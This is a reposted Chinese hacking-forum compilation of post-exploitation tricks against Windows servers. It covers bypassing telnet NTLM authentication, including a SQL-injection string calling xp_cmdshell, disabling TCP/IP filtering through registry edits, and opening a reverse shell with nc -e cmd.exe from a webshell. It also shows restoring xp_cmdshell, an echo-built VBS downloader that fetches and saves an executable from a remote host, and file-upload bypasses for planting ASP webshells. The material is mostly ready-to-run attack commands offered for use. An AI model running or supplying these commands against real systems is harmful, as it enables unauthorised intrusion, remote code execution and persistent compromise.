2、Telnet上去后,先看登陆的用户:
输入命令:query user
系统返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
administrator console 0 运行中 . 2004-10-09 15:37
user1 UserMachine1 1 运行中 . 2004-10-09 15:37
user2 12 已断开 无 2004-10-09 15:37
此时可以看出的可能根我们的不一样,根据具体情况而定。
看到吗? ID 0 的用户是本地登陆的,ID 1 和 ID 12是3389登陆的用户,前者在运行中,后者已经断开了,但是断开了仍然占用系统 资源和通道,我们要把它踢掉。如下进行操作即可。
输入命令:logoff 12
C:\>query user //再看看
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
administrator console 0 运行中 . 2004-10-09 15:37
user1 UserMachine1 1 运行中 . 2004-10-09 15:37
3、如果服务器关闭了telnet功能(这是默认的),还可以通过SqlServer的xp_cmdshell扩展存储过程,使用格式:master.dbo.xp_cmdshell '命令内容',其余可参考第二步。此方式要求有访问xp_cmdshell的权限。
mstsc /console /v:IP:终端端口 T管理
==============================================================
对于Telnet的HTLM身份验证的突破方法总结
By:独孤依人[SST]
对于Telnet的HTLM身份验证的突破方法常用以下四种方法:
1、新建用户法
telnet对方ip,发现需要 NTLM 身份验证。我们在自己的电脑里建立一个要登录的远程帐号和密码都相同的身份为管理员的账户。
找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入刚才新建的帐号和密码,telnet对方ip,直接可以登陆对方电脑了。 这种方法我以前常用的,实用性较强
2、命令法
那就是直接运行命令:tlntadmn config sec = -ntlm
注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证:)
3、上传ntml.exe法
这种方法有很多缺点,比如:对方有杀毒软件,网段屏蔽了TFTP等等.
4、telnet配置信息写入法
直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。
对于Telnet的HTLM身份验证的突破方法用1或2中方法就可解决!
==============================================================
解除TCP/IP筛选 的方法总结
TCP/IP筛选在注册表里有三处,分别是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
然后把 三个文件里的EnableSecurityFilters"=dword:00000001,改成EnableSecurityFilters"=dword:00000000
再将以上三个文件分别用
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
导入注册表即可
附:
解除TCP/IP限制的小技巧
作者:河马史诗 [url]http://www.wrsky.com[/url]
1.用NC反弹得到一个shell
本机监听 NC -l -p 32
WEBSHELL运行:
x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"
得到一个shell
2.CMD下导出注册表文件
C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser
vices\Tcpip
C:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
C:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
修改各文件 EnableSecurityFilters 处
将最后的1改为0
3.将注册表文件导入
x:\xxx>regedit -s 1.reg
x:\xxx>regedit -s 2.reg
x:\xxx>regedit -s 3.reg
-S 为无提示
重启命令 iisreset /reboot
完成TCP/IP筛选限制
============================================================
xp_cmdshell新的恢复办法
xp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复:
删除
drop procedure sp_addextended proc
drop procedure sp_oacreate
exec sp_dropextended proc 'xp_cmdshell'
恢复
dbcc addextended proc ("sp_oacreate","odsole70.dll")
dbcc addextended proc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复,不用去管sp_addextended proc是不是存在
-----------------------------
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextended proc 'xp_cmdshell'
恢复cmdshell的sql语句
exec sp_addextended proc xp_cmdshell ,@dllname ='xplog70.dll'
开启cmdshell的sql语句
exec sp_addextended proc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
恢复xp_cmdshell
exec master.dbo.addextended proc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
否则上传xplog7.0.dll
exec master.dbo.addextended proc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
堵上cmdshell的sql语句
sp_dropextended proc "xp_cmdshel
=============================================================
文件上传方法汇总
文件上传是很早以前的事了,最早那会常用的就是IPC连接,然后一个一个的COPY,自从动网upfile漏洞出来以后,各种脚本系统如PHP.JSP下的文件漏洞纷纷暴出,原理都是大同小异,没有过滤文件上传路径,导致可以抓包然后把空格20改成00,变成空字符NULL,系统是从右往左识别的,所以到空字符那就截断了,更简单的就是过滤文件上传类型不完整,改后缀就可以解决了,这些上传文件的漏洞,用万能上传工具就可以轻松搞定,不过漏洞文件名不同罢了。
还有一些另类的文件上传方法,是在系统做了比较好的防范下完成的,资料来源感谢CD-LION提供一。
先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.
copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已复制一个文件
启动它 d:\downloads\winzip32\winshell.exe 浏览器窗口会停好久,
不用等的,程序已经启动了,点停止,接着,
断开共享连接: net use \\myIP\c$ /del 完成
1利用telnet上传文件 by :jiangyf@usa.net
如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢?
方法很简单:
1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子:
begin 644 file.bat
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT<E!>4%]J
M95@T85!9+7@M04%28#!@*CTP,'500D])04%!049+04]"4$E$34-"04Q%04I-
M3D-"2D%,24%!14U-3D-"1D5'24=&0T%%3D="1T1(0T=02$='2DA#2$9(1$-!
M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@``
`
end
sum -r/size 17903/262
全部都是可见的ASCII字符了
2.用TELNET连接到主机后输入
$ cat >a
然后用WINODWS的拷贝/粘贴,把文件粘贴到telnet窗口
按^d
在当前目录下产生文件a
3.uudecode a
文件复原,然后chmod即可
3脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用
echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序
实例的简化:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs
echo xPost.Open "GET"," [url]http://167168.meibu.com/sr...[/url],0 >>167168.vbs
echo xPost.Send() >>167168.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs
echo sGet.Mode = 3 >>167168.vbs
echo sGet.Type = 1 >>167168.vbs
echo sGet.Open() >>167168.vbs
echo sGet.Write(xPost.responseBody) >>167168.vbs
echo sGet.SaveToFile "srv.exe",2 >>167168.vbs
然后执行cscript 167168.vbs就可以啦.其中, [url]http://167168.meibu.com/sr...[/url]改成你放
文件的网站路径,srv.exe可以改成保存文件的路径。
4.start its: [url]http://167168.meibu.com/ca...[/url] (看清楚,小心论坛自动加的标签)
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" (假设系统装在c盘,且当前环境是SYSTEM。如果是用户环境,修改Default User为该用户名)
dir /s ca[1].rar
然后会显示ca[1].rar的具体位置,比如C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5QMVC11H\ca[1].rar
最后:
copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar
del 0QMVC11H\ca[1].rar
还有可以用EXE2BAT转换成批处理,再上传,这种方法只限于小文件,文件太长粘贴时会出错,传个NC做反向连接是不错的选择。
最近我还遇见一种校友录系统,只有注册后再能上传照片(SESSION),我注册后发现可以上传任意文件,可是只能解析图片类型的后缀,这种情况应该是在服务端又加了一层JSP认正,如果用本地提交可以绕过JSP认正,可是没有登陆,第一层SESSION验证就不会通过了,上传思路是把ASP文件改成JPG后缀上传,然后抓包,这里的数据包已经包含SESSION值了,再修改后缀为ASP,用NC提交,原理就是这样,具体测试在进行中..
转载于:https://blog.51cto.com/foxhack/36612
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
